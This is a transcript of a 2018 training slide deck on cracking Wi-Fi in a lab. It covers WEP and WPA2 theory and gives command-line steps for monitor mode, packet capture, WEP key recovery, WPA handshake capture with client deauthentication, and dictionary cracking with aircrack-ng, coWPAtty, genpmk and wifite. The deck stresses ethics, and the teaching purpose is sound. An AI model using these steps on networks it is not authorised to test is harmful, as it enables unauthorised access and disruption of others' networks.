Presentation is loading. Please wait.

Presentation is loading. Please wait.

Hacking Wi-Fi Beyond Script Kiddie and WEP

Published byRudolf Daniels Modified over 6 years ago

Similar presentations

Presentation on theme: "Hacking Wi-Fi Beyond Script Kiddie and WEP"— Presentation transcript:

1 Hacking Wi-Fi Beyond Script Kiddie and WEP
Jakob Nelson March 8, 2018 This is to always be the SECOND slide.

2 First Things FIRST! - Ethics
Wi-Fi Hacking has a very low probability of being detected. People have networks all around us. They can be tempting. IF IT’S NOT YOURS DON’T PLAY WITH IT! It isn’t hard or expensive to build up some lab systems to try out these techniques. I will be providing documentation on how I created it. Use this slide for all instructor curriculum content. 2

3 What We Will Cover Some theory of wireless communications
Some theory of cryptography The basic standards – A,B,G,N,AC Pre-shared key networks What features a wireless card should have If we have time – Getting AC to work in Linux Use this slide for all instructor curriculum content. 3

4 What We Will NOT Cover 802.1x and enterprise Wi-Fi implementations
Isolated client attacks In depth WEP cracking Post penetration exploitation Use this slide for all instructor curriculum content. 4

5 Documentation: www.jakobnelson.com/
Use this slide for all instructor curriculum content. 5

6 Theory of Wireless Station – A client that can connect to an access point. Access Point – A central device which can accommodate multiple stations connecting at the same time. What is the difference between a router and an access point? Use this slide for all instructor curriculum content. 6

7 Theory of Wireless Time Division Multiple Access (TDMA) Non-overlapping 2.4 GHz (20MHz bandwidth) channels b,g,n: 2,6,11 Non-overlapping 2.4 GHz (40 MHz bandwidth) channels n - 3 Number of overlapping 2.4 GHz channels (in the US) – 1-11 Number of 5 GHz channels – LOTS of them! See: Use this slide for all instructor curriculum content. 7

8 Cryptography Theory What is a stream cipher?
It’s an algorithm that makes pseudorandom bits. How is the cipher text created: XOR pseudorandom bits with plain text to create cipher text. Algorithm: RC4 Use this slide for all instructor curriculum content. 8

9 Cryptography Theory The key is made up of the IV and the Pre-Shared Key. What is broken: Short IV Length: 3 bytes = 2**24 = ~16.8M IVs Many different attacks lead to key recovery. WEP IS BROKEN… DO NOT USE IT! Use this slide for all instructor curriculum content. 9

10 Cryptography Theory Use this slide for all instructor curriculum content. 10

11 What are we going to target?
WEP Packets… lots of data packets. Really we want the IVs, but packets can be decrypted later! Use this slide for all instructor curriculum content. 11

12 Let’s get hands on!

13 Activate Monitor Mode! Airmon-ng Run the following: # airmon-ng
Select a device Put the device in to monitor mode: # airmon-ng start wlan0 4. Kill off all the processes that will interfere with your adapter: # airmon-ng check kill 5. Run it again to verify that we have killed off all the processes.

14 Start the Scan! Airodump-ng Run the following:
# airodump-ng <your monitor interface> This will do a scan of 2.4 GHz ranges. Did you get packets? If you have a 5 GHz capable card, try this: # airodump-ng –b a <your monitor interface>

15 Networks you should see:
2.4 GHz (B,G,N): Target1 - c4:6e1f:16:72:0c Target3 – 30:91:8f:f3:22:35 Target4 – 04:95:e6:59:4c:f1 5 GHz (N): Target2 - 30:91:8f:f3:22:3b Target4 - 04:95:e6:59:4c:f5 Target5 - c8:3a:35:5e:8a:81

16 Saving your sniffed traffic:
Please target specific networks or SSIDs. Remember that they are on a variety of channels. Save packets using –w Filter for the correct bssid with –d

17 Target1 Strategy: Collect a bunch of WEP packets (about 60k) and use aircrack-ng Start sniffing on the appropriate channel and BSSID! Open up another window and navigate to the directory where you are writing the captured packets. Run Aircrack-ng against it: # aircrack-ng <file name>

18

19 What if all my stuff is broken?
Look at the packet capture files for this target.

20 Try these different files and options:
File: Target1-Original.cap Pay attention to the number of IVs. File: Target iv.cap Options: None (default is –f 2) -f 13 -f 14

21

22 Cryptography Theory What is a block cypher?
An algorithm that operates on a block of data. What is a nonce? AP Nonce – 256 bit Station Nonce – 256 bit * Technically these are authenticator and supplicant nonce values. Use this slide for all instructor curriculum content. 22

23 Cryptography Theory What is a MIC? Message Integrity Check Keys: PMK – Pairwise Master Key (This is the pre shared key) PTC – Pairwise Transient Key (Computed based on two nonce values) GTK – Group Transient Key (for multicast and broadcast data) Use this slide for all instructor curriculum content. 23

24 Four-way Handshake (WPA2)
Use this slide for all instructor curriculum content. 24

25 Cryptography Theory AES-CCMP AES-CTR mode with CBC MAC More Info:
Use this slide for all instructor curriculum content. 25

26 What are we going to target?
The 4-way handshake Use this slide for all instructor curriculum content. 26

27 Breaking WPA Breaking WPA relies on guessing the password.
I selected the password from early in the rockyou.txt list. (Time 39s to crack in VM with 2 cores and 4 GB RAM). Pay attention to the k/s (keys / second) rate near the top of the screen and write it down.

28 Target2 and Target3 Strategy:
Get a handshake (should be disassociating itself every 60 seconds) Start sniffing on the appropriate channel and BSSID! Run Aircrack-ng against it: # aircrack-ng –w <dictionary> <file name>

29 What if all my stuff is broken?
A handshake is provided in the following files: Target2-handshake.cap and Target3-handshake.cap

30

31

32 Target4 Strategy: Collect a handshake, but this time, use coWPAtty to crack it. Start sniffing on the appropriate channel and BSSID! Open up another window and navigate to the directory where you are writing the captured packets. Run coWPAtty against it: # cowpatty -d <pmk file> -s <essid> -r <capture file>

33 What if all my stuff is broken?
A handshake is provided in the following files: Target4-handshake.cap

34 What was the advantage of this?
Precompute PMKs for given SSID (ESSID). It’s faster to test them against a handshake when found. ~1800 keys/second with Aircrack-ng 250,000 keys / second with coWPAtty Advantages in pentesting?

35 How do I make my own PMK file?
Use genpmk tool: genpmk –f <wordlist> -d <output file> -s <essid>

36 Are there better tools for this?
Yes, a better tool exists: Pyrit Uses a database of passwords, and ESSIDs. Precomputes all the passwords for all the ESSIDs. Uses GPU Lots faster, but it doesn’t really work for this training session.

37 So you got:

38 Target5 Strategy: 1. Deauth a client using aireplay-ng
2. Crack with aircrack-ng Start sniffing on the appropriate channel and BSSID! Open up another window and navigate to the directory where you are writing the captured packets. Run Aircrack-ng against it: # aircrack-ng <file name>

39 What if all my stuff is broken?
Look at Target5-handshake.cap (Sorry, this is going to be exactly the same exercise done on Target2 and Target3)

40 Target ALL THE THINGS!!!! Strategy: Use wifite…
Let it scan, press ctrl+c DON’T use all! You can attack any of the Target access points previously used. Have fun!

41 What if all my stuff is broken?
Check out my website in a few days for updates and suggestions on making things work.

42

43 I’m Out! Use this slide for all instructor curriculum content. 43

Download ppt "Hacking Wi-Fi Beyond Script Kiddie and WEP"

Similar presentations

Overview How to crack WEP and WPA

Overview How to crack WEP and WPA
1 Practical stuff Crack the WPA key of this laptop. SSID: « Philips WiFi » Password list and cowpatty table available on CD (only useful today).

1 Practical stuff Crack the WPA key of this laptop. SSID: « Philips WiFi » Password list and cowpatty table available on CD (only useful today).
Home Wireless Security David Mitchell 12/11/2007.

Home Wireless Security David Mitchell 12/11/2007.
Crack WEP Lab Last Update 2014.08.12 1.1.0 1Copyright 2014 Kenneth M. Chipps Ph.D. www.chipps.com.

Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge.

ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge.
Wireless Cracking By: Christopher Zacky.

Wireless Cracking By: Christopher Zacky.
IEEE 802.11i IT443 Broadband Communications Philip MacCabe October 5, 2005

IEEE i IT443 Broadband Communications Philip MacCabe October 5, 2005
Crack WPA Lab Last Update 2014.06.11 1.0.0 1Copyright 2014 Kenneth M. Chipps Ph.D. www.chipps.com.

Crack WPA Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
CSE 6590 1.  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in 802.11  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 

CSE  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 
WLAN Security: Cracking WEP/WPA

WLAN Security: Cracking WEP/WPA
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.

Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
Wireless Security Ryan Hayles Jonathan Hawes. Introduction  WEP –Protocol Basics –Vulnerability –Attacks –Video  WPA –Overview –Key Hierarchy –Encryption/Decryption.

Wireless Security Ryan Hayles Jonathan Hawes. Introduction  WEP –Protocol Basics –Vulnerability –Attacks –Video  WPA –Overview –Key Hierarchy –Encryption/Decryption.
1 MD5 Cracking One way hash. Used in online passwords and file verification.

1 MD5 Cracking One way hash. Used in online passwords and file verification.
1 Enhancing Wireless Security with WPA CS-265 Project Section: 2 (11:30 – 12:20) Shefali Jariwala Student ID 001790660.

1 Enhancing Wireless Security with WPA CS-265 Project Section: 2 (11:30 – 12:20) Shefali Jariwala Student ID
The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.

The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.
Wireless Network Security: WEP And Beyond Heidi Parsaye Jason DeVries Roxanne Ilse Heidi Parsaye - Jason DeVries - Roxanne Ilse.

Wireless Network Security: WEP And Beyond Heidi Parsaye Jason DeVries Roxanne Ilse Heidi Parsaye - Jason DeVries - Roxanne Ilse.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.

WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.
WPA2 By Winway Pang. Overview  What is WPA2?  Wi-Fi Protected Access 2  Introduced September 2004  Two Versions  Enterprise – Server Authentication.

WPA2 By Winway Pang. Overview  What is WPA2?  Wi-Fi Protected Access 2  Introduced September 2004  Two Versions  Enterprise – Server Authentication.
 Any unauthorized device that provides wireless access  Implemented using software, hardware, or a combination of both  It can be intentional or unintentionally.

 Any unauthorized device that provides wireless access  Implemented using software, hardware, or a combination of both  It can be intentional or unintentionally.
WLAN What is WLAN? Physical vs. Wireless LAN

WLAN What is WLAN? Physical vs. Wireless LAN

Similar presentations

Ads by Google